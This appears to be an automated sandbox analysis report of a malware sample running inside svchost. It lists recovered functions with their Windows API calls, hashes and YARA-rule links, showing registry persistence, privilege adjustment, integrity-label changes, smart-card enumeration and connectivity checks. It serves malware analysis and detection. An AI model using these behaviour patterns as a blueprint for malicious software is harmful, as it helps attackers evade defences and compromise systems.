                                                                                                                                                                                                              • RegSetValueExA.KERNEL32(00000000,757758f5a,00000000,00000004,?,00000004,?,?,02643B25,?), ref: 026438DC
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(00000000,?,?,02643B25,?), ref: 026438EA
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,02643B25,?), ref: 026438F8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseFlushOpenValue
                                                                                                                                                                                                              • String ID: 757758f5a$software\microsoft
                                                                                                                                                                                                              • API String ID: 2510291871-2885694659
                                                                                                                                                                                                              • Opcode ID: 5d638c599ca99c3b889d00291da5e7f2f408f3b5f1dda09cd414b1b7b81a6d90
                                                                                                                                                                                                              • Instruction ID: 3a743ebae965acaa1a3e5ecd35a4a39a3825a4023633f506c82068f3e44106d5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d638c599ca99c3b889d00291da5e7f2f408f3b5f1dda09cd414b1b7b81a6d90
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8F030B5B40308FFEB10DA91CD4AFAE777CAB04B44F604554FB02EA240DB70AA5097A0
                                                                                                                                                                                                              Function 02669680 Relevance: 10.1, APIs: 8, Instructions: 95memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 026696E6
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 026696ED
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 026696FA
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02669701
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02669710
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02669713
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02669720
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02669723
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0
                                                                                                                                                                                                              • Opcode ID: 6f3c8a1780ee4e7ab29230b00eab8faad247fa5db6a959904d21fcf16b6dbd66
                                                                                                                                                                                                              • Instruction ID: 9a63f1a28492203383f92a26b0327dd51a878d54600d679af41f428f8c4f5b9c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f3c8a1780ee4e7ab29230b00eab8faad247fa5db6a959904d21fcf16b6dbd66
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D31B371901344ABDB209F69DC48BAFBFB8EF84314F158949EC0AAB345D771D950CBA0
                                                                                                                                                                                                              Function 02669880 Relevance: 10.1, APIs: 8, Instructions: 56COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c39f8e904d9f76d9f7889fcfa21f7abd9efbaed2cc6bd8c6c47f920b665c5aed
                                                                                                                                                                                                              • Instruction ID: 4eadc1565dc9551cfae7aac506954552465e28e9c8421f1bed26fa1cafabf1cb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c39f8e904d9f76d9f7889fcfa21f7abd9efbaed2cc6bd8c6c47f920b665c5aed
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F01B571A46284ABD720AFE6EC8CF6F7B5CEB84755F014927FA05C7240CB358850CAB1
                                                                                                                                                                                                              Function 02668AB0 Relevance: 9.1, APIs: 6, Instructions: 108fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000), ref: 02668AF4
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,02669447), ref: 02668B0E
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,?,02669447), ref: 02668B36
                                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(?,?,?,?,?,02669447), ref: 02668B42
                                                                                                                                                                                                                • Part of subcall function 02647310: GetHandleInformation.KERNEL32(?,00000000), ref: 02647324
                                                                                                                                                                                                                • Part of subcall function 02647310: CloseHandle.KERNEL32(?), ref: 02647335
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00140B17,00000000,00000000,00140B17,?,02669447), ref: 02668B6E
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00140B17,02669447,00000000,00140B17), ref: 02668BA0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleViewmemcpy$CloseCreateInformationMappingUnmapWrite
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3741995677-0
                                                                                                                                                                                                              • Opcode ID: e7c3879299ed4d0e53948fcb7be2450d0cfd76cafd9458d2822caa058f51f080
                                                                                                                                                                                                              • Instruction ID: fceed5c0e44f8c007463e8acf985273c459f7cd170d8294b93826dbdd87b4cfd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7c3879299ed4d0e53948fcb7be2450d0cfd76cafd9458d2822caa058f51f080
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73317EB1A00209BBD710DF59DC85B6AF7B8FF58714F10825AE90497780DB70AD65CBD0
                                                                                                                                                                                                              Function 02665850 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SCardEstablishContext.WINSCARD(00000002,00000000,00000000,02656A83,00000000), ref: 02665875
                                                                                                                                                                                                              • SCardListReadersA.WINSCARD(02656A83,00000000,?,FFFFFFFF), ref: 0266588C
                                                                                                                                                                                                              • SCardConnectA.WINSCARD(02656A83,?,00000002,00000003,?,?), ref: 026658BE
                                                                                                                                                                                                              • SCardDisconnect.WINSCARD(?,00000000), ref: 026658E9
                                                                                                                                                                                                              • SCardFreeMemory.WINSCARD(02656A83,?), ref: 02665905
                                                                                                                                                                                                              • SCardReleaseContext.WINSCARD(02656A83), ref: 02665913
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Card$Context$ConnectDisconnectEstablishFreeListMemoryReadersRelease
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3231658416-0
                                                                                                                                                                                                              • Opcode ID: 3f32c87aeed5f4c2025d28886a9a085f1cedc2182da85f85eb03ceb1a7c25fbe
                                                                                                                                                                                                              • Instruction ID: 59e88b825411b81caabdf71fcbd07eb90842904ba230c4d128fb0d5420b2ff66
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f32c87aeed5f4c2025d28886a9a085f1cedc2182da85f85eb03ceb1a7c25fbe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3216D75E00319ABDB20CF99CC49FBEBBB9AF84704F54464DE912A7240D7709A45CBA1
                                                                                                                                                                                                              Function 026659D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02665930: GetCurrentThread.KERNEL32 ref: 02665940
                                                                                                                                                                                                                • Part of subcall function 02665930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02654D1B,?,?,00000000), ref: 02665947
                                                                                                                                                                                                                • Part of subcall function 02665930: GetCurrentProcess.KERNEL32(00000020,02654D1B,?,?,?,?,02654D1B,?,?,00000000), ref: 02665957
                                                                                                                                                                                                                • Part of subcall function 02665930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02654D1B,?,?,00000000), ref: 0266595E
                                                                                                                                                                                                                • Part of subcall function 02665930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02665981
                                                                                                                                                                                                                • Part of subcall function 02665930: AdjustTokenPrivileges.KERNELBASE(02654D1B,00000000,00000001,00000000,00000000,00000000), ref: 0266599B
                                                                                                                                                                                                                • Part of subcall function 02665930: GetLastError.KERNEL32 ref: 026659A5
                                                                                                                                                                                                                • Part of subcall function 02665930: CloseHandle.KERNEL32(02654D1B), ref: 026659B6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 026659EE
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02645DE8,?,?,02645DE8,?,00000001), ref: 02665A0B
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(?,02645DE8,00000010,00000000,00000000,00000000,00000001), ref: 02665A26
                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,02645DE8,?,00000001), ref: 02665A37
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$DescriptorToken$CurrentOpenProcessThread$AdjustCloseConvertErrorFreeHandleInfoLastLocalLookupNamedPrivilegePrivilegesSaclStringValue
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 2236266002-820036962
                                                                                                                                                                                                              • Opcode ID: a34f2f50a4b26ad1885a2691a137f9a0c05e6d8a6ace13582283a1ad5a34da14
                                                                                                                                                                                                              • Instruction ID: baee0a2cf79cbf8ade8a61d6e76b7536c1d701a5e383d1e507ef07803f0bf25b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a34f2f50a4b26ad1885a2691a137f9a0c05e6d8a6ace13582283a1ad5a34da14
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84014C75A40218BBDB10DEA59C89EFFBBBCEF44744F40424AB906D2240D771DA44CBA0
                                                                                                                                                                                                              Function 02643830 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,software\microsoft,00000000,00000101,?,02643B17), ref: 02643864
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,757758f5a,00000000,?,00000000,?), ref: 02643885
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 02643893
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                              • String ID: 757758f5a$software\microsoft
                                                                                                                                                                                                              • API String ID: 3677997916-2885694659
                                                                                                                                                                                                              • Opcode ID: e27d749940ba47a0da56e21d183686e9b31535cc080edee8ec650a336c455549
                                                                                                                                                                                                              • Instruction ID: 978ef4053dea825be60a3e60498e99e26024383410524fd9c1da66ed61fa6582
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e27d749940ba47a0da56e21d183686e9b31535cc080edee8ec650a336c455549
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DDF0ECB5E40308FBEB10DFE4CD45FEEB7B8EB04704F504599E906E6280D7B5AA548B90
                                                                                                                                                                                                              Function 02668D50 Relevance: 7.6, APIs: 5, Instructions: 85timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileType.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02669234), ref: 02668D83
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,0000002C,00000044,00000030,0000003C,?,?,?,?,?,?,?,02669234), ref: 02668DAB
                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,02669234), ref: 02668DD5
                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,02669234), ref: 02668DE3
                                                                                                                                                                                                              • FileTimeToDosDateTime.KERNEL32(?,02669234,?), ref: 02668DF5
                                                                                                                                                                                                                • Part of subcall function 02668890: GetFileType.KERNEL32(?,00000000,00000000), ref: 02668899
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileTime$Type$DateLocalPointerSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 60630809-0
                                                                                                                                                                                                              • Opcode ID: a6b2e012f089f5731a788e4bb32a5e2fd6ec9401db413769de2b6b8e6fb77784
                                                                                                                                                                                                              • Instruction ID: b00229589f63574dbf7220873b349463b3058dd9d08c5f9ad10a444aef9f2bbf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6b2e012f089f5731a788e4bb32a5e2fd6ec9401db413769de2b6b8e6fb77784
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 422132B29007449FC720CFA9D9C45BBF7F8FB48314B500A2EE596C2A40D775A5588B60
                                                                                                                                                                                                              Function 02646DE0 Relevance: 7.6, APIs: 5, Instructions: 81sleepthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02646E00
                                                                                                                                                                                                                • Part of subcall function 02654F80: IsNetworkAlive.SENSAPI(02646E0D,00000000), ref: 02654F93
                                                                                                                                                                                                                • Part of subcall function 02654F80: IsUserAnAdmin.SHELL32 ref: 02654FA1
                                                                                                                                                                                                                • Part of subcall function 02654F80: DnsFlushResolverCache.DNSAPI ref: 02654FAB
                                                                                                                                                                                                                • Part of subcall function 02654F80: memset.MSVCRT ref: 02654FC8
                                                                                                                                                                                                                • Part of subcall function 02654F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,76F90F10), ref: 02654FE7
                                                                                                                                                                                                                • Part of subcall function 02654F80: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02655000
                                                                                                                                                                                                                • Part of subcall function 02654F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02655013
                                                                                                                                                                                                                • Part of subcall function 02654F80: memset.MSVCRT ref: 0265502C
                                                                                                                                                                                                                • Part of subcall function 02654F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,76F90F10), ref: 02655045
                                                                                                                                                                                                                • Part of subcall function 02654F80: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02655058
                                                                                                                                                                                                                • Part of subcall function 02654F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02655065
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4,?,00000000,00000000), ref: 02646E1C
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00006A90,00000000,00000000,00000000), ref: 02646E78
                                                                                                                                                                                                              • WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,76F90F10,?,00000000,00000000), ref: 02646EA0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 02646EB8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$CheckConnectionInternetlstrcpyn$AdminAliveCacheCloseCreateFlushHandleMultipleNetworkObjectsResolverSleepThreadUserWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2160739018-0
                                                                                                                                                                                                              • Opcode ID: 0badd0318c111fcb8ca262b3b2a8c203ea07960a1bc2c6a1bcc41e03936fa8d8
                                                                                                                                                                                                              • Instruction ID: 42104d674fb404b5a610e68c75c440b67177e4aba19e2ef32ed52ee9b9cbaddc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0badd0318c111fcb8ca262b3b2a8c203ea07960a1bc2c6a1bcc41e03936fa8d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26213BB1A843157BEB109B54DCC0F5E329EAB86718F411638EB49971C0DFB0E8C18ADA
                                                                                                                                                                                                              Function 02658080 Relevance: 7.6, APIs: 5, Instructions: 68sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFindFileNameA.SHLWAPI(?), ref: 026580CA
                                                                                                                                                                                                              • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02658108
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02658123
                                                                                                                                                                                                              • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 0265812A
                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02658151
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 433761119-0
                                                                                                                                                                                                              • Opcode ID: ef3c5762321e6216d52af9466e6dec2fd26ee566b4045460f8085ea860fe8b82
                                                                                                                                                                                                              • Instruction ID: 99c1ab5259f502a1ed0907c5ee9fc4ba67b33d02d5bc6f82dd918ef87ef9d6f4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ef3c5762321e6216d52af9466e6dec2fd26ee566b4045460f8085ea860fe8b82
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB21E73094036AEBDB218B68DC54BEE77E86F15304F140AA5DD9297780DBB089C4CFA1
                                                                                                                                                                                                              Function 02668C10 Relevance: 7.6, APIs: 5, Instructions: 64fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,?,026698B8,00000000,00000000,76F92F00,?,02653CFD,00000000,00000000,00000000,00000000,?), ref: 02668C37
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,026698B8,00000000,00000000,76F92F00,?,02653CFD,00000000,00000000,00000000,00000000), ref: 02668C57
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,026698B8,00000000,00000000,76F92F00,?,02653CFD,00000000,00000000,00000000,00000000), ref: 02668C68
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,026698B8,00000000,00000000,76F92F00,?,02653CFD,00000000,00000000,00000000,00000000), ref: 02668C81
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,026698B8,00000000,00000000,76F92F00,?,02653CFD,00000000,00000000,00000000,00000000), ref: 02668C92
                                                                                                                                                                                                                • Part of subcall function 02669680: GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 026696E6
                                                                                                                                                                                                                • Part of subcall function 02669680: HeapValidate.KERNEL32(00000000), ref: 026696ED
                                                                                                                                                                                                                • Part of subcall function 02669680: GetProcessHeap.KERNEL32(00000000,?), ref: 026696FA
                                                                                                                                                                                                                • Part of subcall function 02669680: HeapFree.KERNEL32(00000000), ref: 02669701
                                                                                                                                                                                                                • Part of subcall function 02669680: GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02669710
                                                                                                                                                                                                                • Part of subcall function 02669680: HeapValidate.KERNEL32(00000000), ref: 02669713
                                                                                                                                                                                                                • Part of subcall function 02669680: GetProcessHeap.KERNEL32(00000000,?), ref: 02669720
                                                                                                                                                                                                                • Part of subcall function 02669680: HeapFree.KERNEL32(00000000), ref: 02669723
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$HandleProcess$CloseFreeInformationValidate$FileUnmapView
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3732962355-0
                                                                                                                                                                                                              • Opcode ID: 365073d2c6e4f7b1204273270ddb34de37e5a9e6463b4fbc61897f7d39503065
                                                                                                                                                                                                              • Instruction ID: 9aba026a60ab2a3da7d81f04b6f94b4402b71b82b8a8aea0c01fe6890898c010
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 365073d2c6e4f7b1204273270ddb34de37e5a9e6463b4fbc61897f7d39503065
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF117F71543304EBE7208F79DA8C77EFBE9AF45604F60096DE889D3240E77499498650
                                                                                                                                                                                                              Function 026580A6 Relevance: 7.6, APIs: 5, Instructions: 54sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFindFileNameA.SHLWAPI(?), ref: 026580CA
                                                                                                                                                                                                              • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02658108
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02658123
                                                                                                                                                                                                              • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 0265812A
                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02658151
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 433761119-0
                                                                                                                                                                                                              • Opcode ID: fe5d7e2e42c18303a981e4d8c07879a1597142864bc5cb119eb6fb3c9aa1ee5f
                                                                                                                                                                                                              • Instruction ID: 1358269c27ecd285cbcf3021101375201f4c1b844441fbb7862e7643ff7b66a1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe5d7e2e42c18303a981e4d8c07879a1597142864bc5cb119eb6fb3c9aa1ee5f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2211513498032AEBDB21CB64DC54BEE77A8BF15308F144A95DD52A7780DB709AC4CFA1
                                                                                                                                                                                                              Function 02646A90 Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02646AB4
                                                                                                                                                                                                                • Part of subcall function 02646980: memset.MSVCRT ref: 026469A2
